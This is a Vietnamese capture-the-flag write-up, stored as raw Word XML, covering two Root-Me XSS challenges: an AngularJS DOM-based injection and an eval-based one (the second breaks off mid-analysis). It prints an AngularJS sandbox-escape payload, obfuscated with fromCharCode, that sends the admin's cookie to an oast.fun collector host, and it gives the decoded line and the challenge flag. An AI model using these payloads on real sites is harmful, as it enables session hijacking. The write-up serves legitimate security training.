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E9B8" w14:textId="052AC795" w:rsidR="002F49FE" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008677F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: XSS DOM-Based AngularJS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55374976" w14:textId="450A25C2" w:rsidR="008677F3" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315760EA" w14:textId="0113EAFA" w:rsidR="008677F3" w:rsidRDefault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của bài này là lấy được cookie của nhà quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A18A9" w14:textId="0E01132B" w:rsidR="008677F3" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A491CBB" w14:textId="234A6C4C" w:rsidR="008677F3" w:rsidRDefault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Có 2 input chúng ta kiểm soát được là Main(name) và contact (url).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290B6DD" w14:textId="04C3E4E6" w:rsidR="008677F3" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A311044" w14:textId="3EA8E735" w:rsidR="008677F3" w:rsidRDefault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GET /?name=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BABA36" w14:textId="371B696E" w:rsidR="008677F3" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A87196" w14:textId="0DD17416" w:rsidR="008677F3" w:rsidRDefault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Đây là đoạn script của main.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F2FAF" w14:textId="77777777" w:rsidR="008677F3" w:rsidRDefault="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BBCF4B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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C2B71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</w:t>
      </w:r>
      <w:r w:rsidRPr="008677F3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var name = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB5490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var encoded = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D17C8DD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for(let i = 0; i &lt; name.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481BB18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    encoded += name[i] ^ Math.floor(Math.random() * name.length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF38EBE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DB7CECA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encoded = Math.abs(encoded ^ Math.floor(Math.random() * name.length));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84E4F5" w14:textId="77777777" w:rsidR="008677F3" w:rsidRP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    document.getElementById('name_encoded').innerText += ' ' + encoded;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5FDC8" w14:textId="59B50F2F" w:rsid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 w:rsidRPr="008677F3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12146A46" w14:textId="343DBDFF" w:rsidR="008677F3" w:rsidRDefault="008677F3" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAEACD0" w14:textId="1FED9B69" w:rsidR="008677F3" w:rsidRDefault="008677F3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thử payload sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1'-alert(1)-'</w:t>
      </w:r>
      <w:r w:rsidR="00A16506" w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A16506" w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A16506" w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00A16506" w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var name = '1-alert(1)-';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FCD9A" w14:textId="512F9191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</w:p>
    <w:p w14:paraId="28F054FF" w14:textId="3BFDC2CB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Dấu </w:t>
      </w:r>
      <w:r w:rsidRPr="008677F3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã bị máy chủ stripped, không đóng chuỗi được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126BF83" w14:textId="10917BBB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</w:p>
    <w:p w14:paraId="12032493" w14:textId="77777777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  <w:r w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{constructor.constructor('alert(1)')()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38445E85" w14:textId="25468DC7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A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00A16506">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  var name = '{{constructor.constructor(alert(1))()}}';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Không thực thi lệnh được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63950ACB" w14:textId="67CBEF00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</w:p>
    <w:p w14:paraId="59564DC1" w14:textId="66DE7714" w:rsidR="00A16506" w:rsidRDefault="00360C49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May sao mình tìm được payload không cần dùng dấu nháy đơn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C63EE" w14:textId="57627C33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</w:p>
    <w:p w14:paraId="78438917" w14:textId="2539B83C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  <w:r w:rsidRPr="00360C49">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}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360C49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Thực thi được Javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D9B68" w14:textId="4C1FB4CE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</w:p>
    <w:p w14:paraId="77681C5F" w14:textId="77777777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</w:p>
    <w:p w14:paraId="18895068" w14:textId="6C7E450E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Làm sao để lấy được cookie??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C26C4" w14:textId="5F0F2584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</w:p>
    <w:p w14:paraId="631F10D8" w14:textId="607840F7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  <w:r w:rsidRPr="00360C49">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{constructor.constructor('</w:t>
      </w:r>
      <w:r w:rsidR="009036D1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Javascript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00360C49">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FF4D1" w14:textId="72CA68C4" w:rsidR="00360C49" w:rsidRDefault="009036D1" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009036D1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>document.location=”trang-web-ban-kiem-soat/?c=”+document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A222B3A" w14:textId="6BE12C01" w:rsidR="009036D1" w:rsidRDefault="009036D1" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38621DB2" w14:textId="40B3E075" w:rsidR="009036D1" w:rsidRDefault="009036D1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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986AE6A" w14:textId="77777777" w:rsidR="009036D1" w:rsidRPr="009036D1" w:rsidRDefault="009036D1" w:rsidP="009036D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009036D1">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,99,101,54,112,104,110,101,50,118,116,99,48,48,48,48,52,115,112,113,48,103,56,100,109,101,52,119,121,121,121,121,121,98,46,111,97,115,116,46,102,117,110,47,63,99,61,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6C351" w14:textId="77777777" w:rsidR="009036D1" w:rsidRDefault="009036D1" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7A10E2" w14:textId="1D1B49FD" w:rsidR="00360C49" w:rsidRDefault="00360C49" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A6A2C2" w14:textId="77777777" w:rsidR="00CF1F41" w:rsidRPr="00CF1F41" w:rsidRDefault="00CF1F41" w:rsidP="00CF1F41">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1F41">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,99,101,54,112,104,110,101,50,118,116,99,48,48,48,48,52,115,112,113,48,103,56,100,109,101,52,119,121,121,121,121,121,98,46,111,97,115,116,46,102,117,110,47,63,99,61,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63535AF5" w14:textId="77777777" w:rsidR="00A16506" w:rsidRDefault="00A16506" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA6C1E9" w14:textId="46B4F70F" w:rsidR="008677F3" w:rsidRDefault="00CF1F41" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1F41">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00CF1F41">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.location="http://ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun/?c="+document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2776C48E" w14:textId="125F47B7" w:rsidR="00CF1F41" w:rsidRDefault="00CF1F41" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4EFFEF" w14:textId="5F8FEDBF" w:rsidR="00CF1F41" w:rsidRDefault="00CF1F41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Gửi url cho nhà quản trị, và nhận flag thôi </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1F41">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0B3F2" w14:textId="4324128C" w:rsidR="00CF1F41" w:rsidRDefault="00CF1F41" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E85136" w14:textId="27A95C09" w:rsidR="00CF1F41" w:rsidRDefault="00FE4933" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4933">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag=rootme{@NGu1@R_J$_1$_C001}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C8470" w14:textId="57B174E2" w:rsidR="008C451E" w:rsidRDefault="008C451E" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDDE4C8" w14:textId="597E4F26" w:rsidR="008C451E" w:rsidRDefault="008C451E" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C451E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 2: XSS Dom Based Eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF38A6" w14:textId="261D1BF6" w:rsidR="008C451E" w:rsidRDefault="008C451E" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C6762C" w14:textId="535932BA" w:rsidR="008C451E" w:rsidRDefault="00CA4612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là lấy được cookie của nhà quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBE25D" w14:textId="1D27C6A1" w:rsidR="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FBD4D9" w14:textId="1C6EBB5C" w:rsidR="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="008677F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Giống mấy bài trước, lỗi XSS ở phần Main (nơi có script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F166C58" w14:textId="7A476773" w:rsidR="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="008677F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A309422" w14:textId="77777777" w:rsidR="00CA4612" w:rsidRPr="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4612">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">           &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AFAB7A" w14:textId="77777777" w:rsidR="00CA4612" w:rsidRPr="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4612">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="002A210E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var result = eval(1*2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225239F8" w14:textId="77777777" w:rsidR="00CA4612" w:rsidRPr="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4612">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            document.getElementById('state').innerText = '1*2 = ' + result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20588DCE" w14:textId="12B44591" w:rsidR="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4612">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD75F0" w14:textId="53023CBF" w:rsidR="00CA4612" w:rsidRDefault="00CA4612" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E14CF2" w14:textId="217FE1BD" w:rsidR="00CA4612" w:rsidRDefault="002A210E" w:rsidP="00CA46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thử </w:t>
      </w:r>
      <w:r w:rsidRPr="002A210E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert(1)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A210E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A210E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These caracteres: () are forbidden because some evil people tried to exploit my website :'(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203C9CE" w14:textId="2661BBE1" w:rsidR="002A210E" w:rsidRDefault="002A210E" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E716AA0" w14:textId="6316E842" w:rsidR="002A210E" w:rsidRDefault="002A210E" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A210E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert`1`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002A210E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="002A210E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Your calculation has not the good format, it must valid the regex /^\d+[\+|\-|\*|\/]\d+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D90C90" w14:textId="21C3A8F6" w:rsidR="002A210E" w:rsidRDefault="002A210E" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A35A521" w14:textId="1670954F" w:rsidR="002A210E" w:rsidRDefault="002A210E" w:rsidP="00CA46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^\d+: bắt đầu bằng kí tự số</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CC087" w14:textId="4D718F42" w:rsidR="004B29CC" w:rsidRDefault="004B29CC" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B29CC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[\+|\-|\*|\/]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\d+: tiếp theo là phép toán +,-,*,/ và kết thúc là kí tự số</w:t>
      </w:r>
